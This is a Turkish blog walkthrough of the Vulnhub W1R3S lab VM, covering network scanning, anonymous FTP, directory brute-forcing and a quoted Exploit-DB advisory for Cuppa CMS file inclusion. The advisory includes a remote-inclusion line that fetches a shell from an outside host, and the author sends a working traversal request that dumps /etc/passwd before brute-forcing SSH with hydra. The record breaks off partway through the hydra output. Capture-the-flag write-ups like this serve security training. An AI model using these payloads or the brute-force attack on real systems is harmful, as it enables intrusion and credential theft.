{"id":1330,"date":"2021-07-11T01:43:36","date_gmt":"2021-07-11T01:43:36","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1330"},"modified":"2021-07-11T01:43:36","modified_gmt":"2021-07-11T01:43:36","slug":"w1r3s-1-0-1","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/07\/11\/w1r3s-1-0-1\/","title":{"rendered":"W1R3S: 1.0.1"},"content":{"rendered":"

Makine Hakk\u0131nda Bilgiler<\/h2>\n

A\u00e7\u0131klama:<\/strong>
\nYou have been hired to do a penetration test on the W1R3S.inc individual server and report all findings. They have asked you to gain root access and find the flag (located in \/root directory).<\/p>\n

Difficulty to get a low privileged shell: Beginner\/Intermediate<\/p>\n

Difficulty to get privilege escalation: Beginner\/Intermediate<\/p>\n

About: This is a vulnerable Ubuntu box giving you somewhat of a real world scenario and reminds me of the OSCP labs.<\/p>\n

If you need any hints, pointers or have questions feel free to email me: specterinthewires at gmail dot com<\/p>\n

Virtual Machine: VMware Workstation<\/p>\n

Vulnhub Sayfas\u0131:<\/strong>
\nhttps:\/\/www.vulnhub.com\/entry\/w1r3s-101,220\/<\/a><\/p>\n

\u0130ndirme Sayfas\u0131:<\/strong>
\nhttps:\/\/download.vulnhub.com\/w1r3s\/w1r3s.v1.0.1.zip<\/a><\/p>\n

Walkthrough<\/h2>\n

Makineyi tespit ederek ba\u015flayal\u0131m.<\/p>\n

\u250c\u2500\u2500(root💀kali)-[~]\n\u2514\u2500# arp-scan -l\nInterface: eth0, type: EN10MB, MAC: 00:0c:29:97:a8:e4, IPv4: 192.168.6.132\nStarting arp-scan 1.9.7 with 256 hosts (https:\/\/github.com\/royhills\/arp-scan)\n192.168.6.2 00:50:56:f3:da:b0   VMware, Inc.\n192.168.6.1 00:50:56:c0:00:08   VMware, Inc.\n192.168.6.135   00:0c:29:6a:49:14   VMware, Inc.\n192.168.6.254   00:50:56:e2:58:34   VMware, Inc.\n\n35 packets received by filter, 0 packets dropped by kernel\nEnding arp-scan 1.9.7: 256 hosts scanned in 1.942 seconds (131.82 hosts\/sec). 4 responded\n<\/code><\/pre>\n
nmap taramas\u0131 ile devam edelim.<\/p>\n
[*] Scan: 187\nStarting Nmap 7.91 ( https:\/\/nmap.org ) at 2021-07-10 21:33 EDT\nNmap scan report for W1R3S.inc (192.168.6.135)\nHost is up (0.00044s latency).\nNot shown: 55528 filtered ports, 10003 closed ports\nPORT     STATE SERVICE VERSION\n21\/tcp   open  ftp     vsftpd 2.0.8 or later\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\n| drwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 content\n| drwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 docs\n|_drwxr-xr-x    2 ftp      ftp          4096 Jan 28  2018 new-employees\n| ftp-syst: \n|   STAT: \n| FTP server status:\n|      Connected to ::ffff:192.168.6.132\n|      Logged in as ftp\n|      TYPE: ASCII\n|      No session bandwidth limit\n|      Session timeout in seconds is 300\n|      Control connection is plain text\n|      Data connections will be plain text\n|      At session startup, client count was 3\n|      vsFTPd 3.0.3 - secure, fast, stable\n|_End of status\n22\/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 07:e3:5a:5c:c8:18:65:b0:5f:6e:f7:75:c7:7e:11:e0 (RSA)\n|   256 03:ab:9a:ed:0c:9b:32:26:44:13:ad:b0:b0:96:c3:1e (ECDSA)\n|_  256 3d:6d:d2:4b:46:e8:c9:a3:49:e0:93:56:22:2e:e3:54 (ED25519)\n80\/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))\n|_http-server-header: Apache\/2.4.18 (Ubuntu)\n|_http-title: Apache2 Ubuntu Default Page: It works\n3306\/tcp open  mysql   MySQL (unauthorized)\nMAC Address: 00:0C:29:6A:49:14 (VMware)\nDevice type: general purpose\nRunning: Linux 3.X|4.X\nOS CPE: cpe:\/o:linux:linux_kernel:3 cpe:\/o:linux:linux_kernel:4\nOS details: Linux 3.10 - 4.11\nNetwork Distance: 1 hop\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nTRACEROUTE\nHOP RTT     ADDRESS\n1   0.44 ms W1R3S.inc (192.168.6.135)\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 56.85 seconds\n<\/code><\/pre>\n
ftp anonymous giri\u015f vard\u0131. Buradaki dosyalar\u0131 ald\u0131m ancak pek bir yard\u0131m\u0131 olmad\u0131.<\/p>\n
\n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/w1r3s]\n\u2514\u2500# ftp 192.168.6.135 \nConnected to 192.168.6.135.\n220 Welcome to W1R3S.inc FTP service.\nName (192.168.6.135:kali): anonymous\n331 Please specify the password.\nPassword:\n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp> ls\n200 PORT command successful. Consider using PASV.\n150 Here comes the directory listing.\ndrwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 content\ndrwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 docs\ndrwxr-xr-x    2 ftp      ftp          4096 Jan 28  2018 new-employees\n226 Directory send OK.\nftp> cd content\n250 Directory successfully changed.\nftp> ls\n200 PORT command successful. Consider using PASV.\n150 Here comes the directory listing.\n-rw-r--r--    1 ftp      ftp            29 Jan 23  2018 01.txt\n-rw-r--r--    1 ftp      ftp           165 Jan 23  2018 02.txt\n-rw-r--r--    1 ftp      ftp           582 Jan 23  2018 03.txt\n226 Directory send OK.\nftp> get 01.txt\nlocal: 01.txt remote: 01.txt\n200 PORT command successful. Consider using PASV.\n150 Opening BINARY mode data connection for 01.txt (29 bytes).\n226 Transfer complete.\n29 bytes received in 0.00 secs (11.7903 kB\/s)\nftp> get 02.txt\nlocal: 02.txt remote: 02.txt\n200 PORT command successful. Consider using PASV.\n150 Opening BINARY mode data connection for 02.txt (165 bytes).\n226 Transfer complete.\n165 bytes received in 0.00 secs (69.5437 kB\/s)\nftp> get 03.txt\nlocal: 03.txt remote: 03.txt\n200 PORT command successful. Consider using PASV.\n150 Opening BINARY mode data connection for 03.txt (582 bytes).\n226 Transfer complete.\n582 bytes received in 0.00 secs (301.3570 kB\/s)\nftp> cd ..\n250 Directory successfully changed.\nftp> ls\n200 PORT command successful. Consider using PASV.\n150 Here comes the directory listing.\ndrwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 content\ndrwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 docs\ndrwxr-xr-x    2 ftp      ftp          4096 Jan 28  2018 new-employees\n226 Directory send OK.\nftp> cd docs\n250 Directory successfully changed.\nftp> ls\n200 PORT command successful. Consider using PASV.\n150 Here comes the directory listing.\n-rw-r--r--    1 ftp      ftp           138 Jan 23  2018 worktodo.txt\n226 Directory send OK.\nftp> get worktodo.txt\nlocal: worktodo.txt remote: worktodo.txt\n200 PORT command successful. Consider using PASV.\n150 Opening BINARY mode data connection for worktodo.txt (138 bytes).\n226 Transfer complete.\n138 bytes received in 0.00 secs (74.2101 kB\/s)\nftp> cd ..\n250 Directory successfully changed.\nftp> ls\n200 PORT command successful. Consider using PASV.\n150 Here comes the directory listing.\ndrwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 content\ndrwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 docs\ndrwxr-xr-x    2 ftp      ftp          4096 Jan 28  2018 new-employees\n226 Directory send OK.\nftp> cd new-employees\n250 Directory successfully changed.\nftp> ls\n200 PORT command successful. Consider using PASV.\n150 Here comes the directory listing.\n-rw-r--r--    1 ftp      ftp           155 Jan 28  2018 employee-names.txt\n226 Directory send OK.\nftp> get employee-names.txt\nlocal: employee-names.txt remote: employee-names.txt\n200 PORT command successful. Consider using PASV.\n150 Opening BINARY mode data connection for employee-names.txt (155 bytes).\n226 Transfer complete.\n155 bytes received in 0.00 secs (809.4502 kB\/s)\nftp> exit\n221 Goodbye.<\/code><\/pre>\n
Ald\u0131\u011f\u0131m dosyalardan baz\u0131 kullan\u0131c\u0131lar \u00e7\u0131karmaya \u00e7al\u0131\u015ft\u0131m daha sonras\u0131nda bunlarla ssh i\u00e7in bruteforce denedim ancak ha\u015far\u0131l\u0131 olamad\u0131m.<\/p>\n
\u250c\u2500\u2500(root💀kali)-[~\/oscp\/w1r3s]\n\u2514\u2500# ls\n01.txt  02.txt  03.txt  employee-names.txt  worktodo.txt\n\n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/w1r3s]\n\u2514\u2500# cat 01.txt             \nNew FTP Server For W1R3S.inc\n\n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/w1r3s]\n\u2514\u2500# cat 02.txt \n#\n#\n#\n#\n#\n#\n#\n#\n01ec2d8fc11c493b25029fb1f47f39ce\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\nSXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==\n############################################\n\n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/w1r3s]\n\u2514\u2500# cat 03.txt \n___________.__              __      __  ______________________   _________    .__               \n\\__    ___\/|  |__   ____   \/  \\    \/  \\\/_   \\______   \\_____  \\ \/   _____\/    |__| ____   ____  \n  |    |   |  |  \\_\/ __ \\  \\   \\\/\\\/   \/ |   ||       _\/ _(__  < \\_____  \\     |  |\/    \\_\/ ___\\ \n  |    |   |   Y  \\  ___\/   \\        \/  |   ||    |   \\\/       \\\/        \\    |  |   |  \\  \\___ \n  |____|   |___|  \/\\___  >   \\__\/\\  \/   |___||____|_  \/______  \/_______  \/ \/\\ |__|___|  \/\\___  >\n                \\\/     \\\/         \\\/                \\\/       \\\/        \\\/  \\\/         \\\/     \\\/ \n\n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/w1r3s]\n\u2514\u2500# ls         \n01.txt  02.txt  03.txt  employee-names.txt  worktodo.txt\n\n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/w1r3s]\n\u2514\u2500# cat employee-names.txt \nThe W1R3S.inc employee list\n\nNaomi.W - Manager\nHector.A - IT Dept\nJoseph.G - Web Design\nAlbert.O - Web Design\nGina.L - Inventory\nRico.D - Human Resources\n\n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/w1r3s]\n\u2514\u2500# cat worktodo.txt      \n    \u0131 pou,\u0287 \u0287\u0265\u0131u\u029e \u0287\u0265\u0131s \u0131s \u0287\u0265\u01dd \u028d\u0250\u028e \u0287o \u0279oo\u0287\u00a1\n\n....puno\u0279\u0250 \u0183u\u0131\u028e\u0250\u05dfd do\u0287s \u2018op o\u0287 \u029e\u0279o\u028d \u025fo \u0287o\u05df \u0250 \u01dd\u028c\u0250\u0265 \u01dd\u028d\n\n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/w1r3s]\n\u2514\u2500# touch users    \n\n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/w1r3s]\n\u2514\u2500# echo "naomi\\nhector\\njoseph\\nalbert\\ngina\\nrico" >> users\n\n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/w1r3s]\n\u2514\u2500# cat users       \nnaomi\nhector\njoseph\nalbert\ngina\nrico<\/code><\/pre>\n
    \n
  1. porta gitti\u011fimde dizin ke\u015ffi yapt\u0131m ve \u00e7al\u0131\u015fan bir uygulama g\u00f6rd\u00fcm.<\/li>\n<\/ol>\n
    \u250c\u2500\u2500(root💀kali)-[~\/oscp\/w1r3s\/gobuster]\n\u2514\u2500# gobuster dir --url http:\/\/192.168.6.135 --add-slash --expanded --follow-redirect --status-codes-blacklist 404 --extensions php,html,bak,sql,txt,zip,rar,7z,conf,php5,sh,bash,cap,pcap -t 50 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-big.txt  --no-error | tee 1\n\n===============================================================\nGobuster v3.1.0\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.6.135\n[+] Method:                  GET\n[+] Threads:                 50\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-big.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.1.0\n[+] Extensions:              html,rar,7z,php,bak,txt,zip,sql,conf,php5,sh,bash,cap,pcap\n[+] Add Slash:               true\n[+] Follow Redirect:         true\n[+] Expanded:                true\n[+] Timeout:                 10s\n===============================================================\n2021\/07\/10 18:38:47 Starting gobuster in directory enumeration mode\n===============================================================\nhttp:\/\/192.168.6.135\/icons\/               (Status: 403) [Size: 294]\nhttp:\/\/192.168.6.135\/index.html           (Status: 200) [Size: 11321]\nhttp:\/\/192.168.6.135\/javascript\/          (Status: 403) [Size: 299]  \nhttp:\/\/192.168.6.135\/administrator\/       (Status: 200) [Size: 4322] \nhttp:\/\/192.168.6.135\/server-status\/       (Status: 403) [Size: 302]  \nProgress: 2758095 \/ 19107510 (14.43%)                               ^C\n\n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/w1r3s\/gobuster]\n\u2514\u2500# gobuster dir --url http:\/\/192.168.6.135\/administrator --add-slash --expanded --follow-redirect --status-codes-blacklist 404 --extensions php,html,bak,sql,txt,zip,rar,7z,conf,php5,sh,bash,cap,pcap -t 50 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-big.txt  --no-error | tee 2  \n\n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/w1r3s\/gobuster]\n\u2514\u2500# gobuster dir --url http:\/\/192.168.6.135\/administrator --add-slash --expanded --follow-redirect --status-codes-blacklist 404 --extensions php,html,bak,sql,txt,zip,rar,7z,conf,php5,sh,bash,cap,pcap -t 50 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-big.txt  --no-error | tee 2\n\n===============================================================\nGobuster v3.1.0\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.6.135\/administrator\n[+] Method:                  GET\n[+] Threads:                 50\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-big.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.1.0\n[+] Extensions:              zip,7z,conf,bash,bak,php,html,sql,txt,rar,php5,sh,cap,pcap\n[+] Add Slash:               true\n[+] Follow Redirect:         true\n[+] Expanded:                true\n[+] Timeout:                 10s\n===============================================================\n2021\/07\/10 18:45:38 Starting gobuster in directory enumeration mode\n===============================================================\nhttp:\/\/192.168.6.135\/administrator\/media\/               (Status: 200) [Size: 2624]\nhttp:\/\/192.168.6.135\/administrator\/templates\/           (Status: 200) [Size: 31]  \nhttp:\/\/192.168.6.135\/administrator\/index.php            (Status: 200) [Size: 4322]\nhttp:\/\/192.168.6.135\/administrator\/alerts\/              (Status: 200) [Size: 31]  \nhttp:\/\/192.168.6.135\/administrator\/language\/            (Status: 200) [Size: 1160]\nhttp:\/\/192.168.6.135\/administrator\/js\/                  (Status: 200) [Size: 31]  \nhttp:\/\/192.168.6.135\/administrator\/components\/          (Status: 200) [Size: 31]  \nhttp:\/\/192.168.6.135\/administrator\/api\/                 (Status: 200) [Size: 62]  \nhttp:\/\/192.168.6.135\/administrator\/classes\/             (Status: 200) [Size: 31]  \nhttp:\/\/192.168.6.135\/administrator\/extensions\/          (Status: 200) [Size: 31]  \nhttp:\/\/192.168.6.135\/administrator\/robots.txt           (Status: 200) [Size: 26]  \nhttp:\/\/192.168.6.135\/administrator\/installation\/        (Status: 200) [Size: 4322]\nhttp:\/\/192.168.6.135\/administrator\/Configuration.php    (Status: 200) [Size: 0]   \n                                                                                  C\n\n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/w1r3s\/gobuster]\n\u2514\u2500#                                                                                                                                                     130 \u2a2f\n<\/code><\/pre>\n
    \u00c7al\u0131\u015fan uygulamay ait exploit db'de yaz\u0131lm\u0131\u015f bir yaz\u0131 vard\u0131.<\/p>\n
    \u250c\u2500\u2500(root💀kali)-[~\/oscp\/w1r3s\/gobuster]\n\u2514\u2500# searchsploit cuppa cms                          \n---------------------------------------------------------------------------------------------------------------------------- ---------------------------------\n Exploit Title                                                                                                              |  Path\n---------------------------------------------------------------------------------------------------------------------------- ---------------------------------\nCuppa CMS - '\/alertConfigField.php' Local\/Remote File Inclusion                                                             | php\/webapps\/25971.txt\n---------------------------------------------------------------------------------------------------------------------------- ---------------------------------\nShellcodes: No Results\n\n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/w1r3s\/gobuster]\n\u2514\u2500# cd ..                  \n\n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/w1r3s]\n\u2514\u2500# cp $(locate php\/webapps\/25971.txt) .                              \n\n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/w1r3s]\n\u2514\u2500# cat 25971.txt                       \n# Exploit Title   : Cuppa CMS File Inclusion\n# Date            : 4 June 2013\n# Exploit Author  : CWH Underground\n# Site            : www.2600.in.th\n# Vendor Homepage : http:\/\/www.cuppacms.com\/\n# Software Link   : http:\/\/jaist.dl.sourceforge.net\/project\/cuppacms\/cuppa_cms.zip\n# Version         : Beta\n# Tested on       : Window and Linux\n\n  ,--^----------,--------,-----,-------^--,\n  | |||||||||   `--------'     |          O .. CWH Underground Hacking Team ..\n  `+---------------------------^----------|\n    `\\_,-------, _________________________|\n      \/ XXXXXX \/`|     \/\n     \/ XXXXXX \/  `\\   \/\n    \/ XXXXXX \/\\______(\n   \/ XXXXXX \/          \n  \/ XXXXXX \/\n (________(            \n  `------'\n\n####################################\nVULNERABILITY: PHP CODE INJECTION\n####################################\n\n\/alerts\/alertConfigField.php (LINE: 22)\n\n-----------------------------------------------------------------------------\nLINE 22: \n        <\n-----------------------------------------------------------------------------\n\n#####################################################\nDESCRIPTION\n#####################################################\n\nAn attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise.\n\nhttp:\/\/target\/cuppa\/alerts\/alertConfigField.php?urlConfig=[FI]\n\n#####################################################\nEXPLOIT\n#####################################################\n\nhttp:\/\/target\/cuppa\/alerts\/alertConfigField.php?urlConfig=http:\/\/www.shell.com\/shell.txt?\nhttp:\/\/target\/cuppa\/alerts\/alertConfigField.php?urlConfig=..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd\n\nMoreover, We could access Configuration.php source code via PHPStream \n\nFor Example:\n-----------------------------------------------------------------------------\nhttp:\/\/target\/cuppa\/alerts\/alertConfigField.php?urlConfig=php:\/\/filter\/convert.base64-encode\/resource=..\/Configuration.php\n-----------------------------------------------------------------------------\n\nBase64 Encode Output:\n-----------------------------------------------------------------------------\nPD9waHAgCgljbGFzcyBDb25maWd1cmF0aW9uewoJCXB1YmxpYyAkaG9zdCA9ICJsb2NhbGhvc3QiOwoJCXB1YmxpYyAkZGIgPSAiY3VwcGEiOwoJCXB1YmxpYyAkdXNlciA9ICJyb290IjsKCQlwdWJsaWMgJHBhc3N3b3JkID0gIkRiQGRtaW4iOwoJCXB1YmxpYyAkdGFibGVfcHJlZml4ID0gImN1XyI7CgkJcHVibGljICRhZG1pbmlzdHJhdG9yX3RlbXBsYXRlID0gImRlZmF1bHQiOwoJCXB1YmxpYyAkbGlzdF9saW1pdCA9IDI1OwoJCXB1YmxpYyAkdG9rZW4gPSAiT0JxSVBxbEZXZjNYIjsKCQlwdWJsaWMgJGFsbG93ZWRfZXh0ZW5zaW9ucyA9ICIqLmJtcDsgKi5jc3Y7ICouZG9jOyAqLmdpZjsgKi5pY287ICouanBnOyAqLmpwZWc7ICoub2RnOyAqLm9kcDsgKi5vZHM7ICoub2R0OyAqLnBkZjsgKi5wbmc7ICoucHB0OyAqLnN3ZjsgKi50eHQ7ICoueGNmOyAqLnhsczsgKi5kb2N4OyAqLnhsc3giOwoJCXB1YmxpYyAkdXBsb2FkX2RlZmF1bHRfcGF0aCA9ICJtZWRpYS91cGxvYWRzRmlsZXMiOwoJCXB1YmxpYyAkbWF4aW11bV9maWxlX3NpemUgPSAiNTI0Mjg4MCI7CgkJcHVibGljICRzZWN1cmVfbG9naW4gPSAwOwoJCXB1YmxpYyAkc2VjdXJlX2xvZ2luX3ZhbHVlID0gIiI7CgkJcHVibGljICRzZWN1cmVfbG9naW5fcmVkaXJlY3QgPSAiIjsKCX0gCj8+\n-----------------------------------------------------------------------------\n\nBase64 Decode Output:\n-----------------------------------------------------------------------------\n<?php \n    class Configuration{\n        public $host = "localhost";\n        public $db = "cuppa";\n        public $user = "root";\n        public $password = "Db@dmin";\n        public $table_prefix = "cu_";\n        public $administrator_template = "default";\n        public $list_limit = 25;\n        public $token = "OBqIPqlFWf3X";\n        public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";\n        public $upload_default_path = "media\/uploadsFiles";\n        public $maximum_file_size = "5242880";\n        public $secure_login = 0;\n        public $secure_login_value = "";\n        public $secure_login_redirect = "";\n    } \n?>\n-----------------------------------------------------------------------------\n\nAble to read sensitive information via File Inclusion (PHP Stream)\n\n################################################################################################################\n Greetz      : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2 \n################################################################################################################   <\/code><\/pre>\n
    S\u0131k\u0131nt\u0131l\u0131 nokta \u015fu, buradaki exploiti a\u00e7\u0131klamaya uygun bir \u015fekilde denedi\u011fimde kullanamad\u0131m. Get iste\u011fi yapmam\u0131z bekleniyor. Ancak POST iste\u011fi ile manip\u00fcle edebiliyoruz. G\u00f6nderdi\u011fim post iste\u011fi a\u015fa\u011f\u0131da verilmi\u015ftir.<\/p>\n
    POST \/administrator\/alerts\/alertConfigField.php HTTP\/1.1\nHost: 192.168.6.135\nContent-Type: application\/x-www-form-urlencoded \nContent-Length: 121\n\nurlConfig=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<\/code><\/pre>\n
    HTTP\/1.1 200 OK\nDate: Sun, 11 Jul 2021 00:32:58 GMT\nServer: Apache\/2.4.18 (Ubuntu)\nSet-Cookie: country=us; path=\/\nSet-Cookie: language=en; path=\/\nSet-Cookie: PHPSESSID=tl8pvlp28e5niha6si2nvrlu57; path=\/\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate\nPragma: no-cache\nVary: Accept-Encoding\nContent-Length: 4347\nContent-Type: text\/html; charset=UTF-8\n\n<style>\n\n    .new_content{\n\n        position: fixed;\n\n    }\n\n    .alert_config_field{\n\n        font-size:12px;\n\n        background:#FFF;\n\n        position:relative;\n\n        border-radius: 3px;\n\n        box-shadow: 0px 0px 5px rgba(0,0,0,0.2);\n\n        overflow:hidden;\n\n        position:fixed;\n\n        top:50%;\n\n        left:50%;\n\n        width:600px;\n\n        height:440px;\n\n        margin-left:-300px;\n\n        margin-top:-220px;\n\n    }\n\n    .alert_config_top{\n\n        position: relative;\n\n        margin: 2px;\n\n        margin-bottom: 0px;\n\n        border: 1px solid #D2D2D2;\n\n        background: #4489F8;\n\n        overflow: auto;\n\n        color:#FFF;\n\n        font-size: 13px;\n\n        padding: 7px 5px;\n\n        box-shadow: 0 0 2px rgba(0, 0, 0, 0.1);\n\n        text-shadow: 0 1px 1px rgba(0, 0, 0, 0.2);\n\n    }\n\n    .description_alert{\n\n        position:relative;\n\n        font-size:12px;\n\n        text-shadow:0 1px #FFFFFF;\n\n        font-weight: normal;\n\n        padding: 5px 0px 5px 0px;\n\n    }\n\n    .btnClose_alert{\n\n        position:absolute;\n\n        top: 4px; right: 2px;\n\n        width:22px;\n\n        height:22px;\n\n        cursor:pointer;\n\n        background:url(js\/cuppa\/cuppa_images\/close_white.png) no-repeat;\n\n        background-position: center;\n\n        background-size: 13px;\n\n    }\n\n    .content_alert_config{\n\n        position:relative;\n\n        clear:both;\n\n        margin: 2px;\n\n        margin-top: 0px;\n\n        height: 401px;\n\n        padding: 10px;\n\n        overflow: auto;\n\n    }\n\n<\/style>\n\n<script>\n\n    function CloseDefaultAlert(){\n\n        cuppa.setContent({'load':false, duration:0.2});\n\n        cuppa.blockade({'load':false, duration:0.2, delay:0.1});\n\n    }\n\n<\/script>\n\n<div class="alert_config_field" id="alert">\n\n    <div class="alert_config_top">\n\n        <strong>Configuration<\/strong>:         <div class="btnClose_alert" id="btnClose_alert" onclick="CloseDefaultAlert()"><\/div>\n\n    <\/div>\n\n    <div id="content_alert_config" class="content_alert_config">\n\n        root:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:100:102:systemd Time Synchronization,,,:\/run\/systemd:\/bin\/false\nsystemd-network:x:101:103:systemd Network Management,,,:\/run\/systemd\/netif:\/bin\/false\nsystemd-resolve:x:102:104:systemd Resolver,,,:\/run\/systemd\/resolve:\/bin\/false\nsystemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:\/run\/systemd:\/bin\/false\nsyslog:x:104:108::\/home\/syslog:\/bin\/false\n_apt:x:105:65534::\/nonexistent:\/bin\/false\nmessagebus:x:106:110::\/var\/run\/dbus:\/bin\/false\nuuidd:x:107:111::\/run\/uuidd:\/bin\/false\nlightdm:x:108:114:Light Display Manager:\/var\/lib\/lightdm:\/bin\/false\nwhoopsie:x:109:117::\/nonexistent:\/bin\/false\navahi-autoipd:x:110:119:Avahi autoip daemon,,,:\/var\/lib\/avahi-autoipd:\/bin\/false\navahi:x:111:120:Avahi mDNS daemon,,,:\/var\/run\/avahi-daemon:\/bin\/false\ndnsmasq:x:112:65534:dnsmasq,,,:\/var\/lib\/misc:\/bin\/false\ncolord:x:113:123:colord colour management daemon,,,:\/var\/lib\/colord:\/bin\/false\nspeech-dispatcher:x:114:29:Speech Dispatcher,,,:\/var\/run\/speech-dispatcher:\/bin\/false\nhplip:x:115:7:HPLIP system user,,,:\/var\/run\/hplip:\/bin\/false\nkernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:\/:\/bin\/false\npulse:x:117:124:PulseAudio daemon,,,:\/var\/run\/pulse:\/bin\/false\nrtkit:x:118:126:RealtimeKit,,,:\/proc:\/bin\/false\nsaned:x:119:127::\/var\/lib\/saned:\/bin\/false\nusbmux:x:120:46:usbmux daemon,,,:\/var\/lib\/usbmux:\/bin\/false\nw1r3s:x:1000:1000:w1r3s,,,:\/home\/w1r3s:\/bin\/bash\nsshd:x:121:65534::\/var\/run\/sshd:\/usr\/sbin\/nologin\nftp:x:122:129:ftp daemon,,,:\/srv\/ftp:\/bin\/false\nmysql:x:123:130:MySQL Server,,,:\/nonexistent:\/bin\/false\n    <\/div>\n\n<\/div><\/code><\/pre>\n
    Gelen cevapta ba\u015far\u0131l\u0131 bir \u015fekilde w1r3s<\/strong>  kullan\u0131c\u0131s\u0131n\u0131 elde edebiliyoruz. \u0130\u015fleri daha kolay halletmek i\u00e7in bunun python kodunu yaz\u0131dm ve exploit db'ye g\u00f6nderdim.<\/p>\n
    Daha sonras\u0131nda hydra ile tekrar bir sald\u0131r\u0131 d\u00fczenledim.<\/p>\n
    \n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/w1r3s]\n\u2514\u2500# hydra -L users -P \/usr\/share\/wordlists\/rockyou.txt ssh:\/\/192.168.6.135\nHydra v9.1 (c) 2020 by van Hauser\/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2021-07-10 20:01:47\n[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1\/p:14344399), ~896525 tries per task\n[DATA] attacking ssh:\/\/192.168.6.135:22\/\n[22][ssh] host: 192.168.6.135   login: w1r3s   password: computer\n1 of 1 target successfully completed, 1 valid password found\n[WARNING] Writing restore file because 1 final worker threads did not complete until end.\n[ERROR] 1 target did not resolve or could not be connected\n[ERROR] 0 target did not complete\nHydra 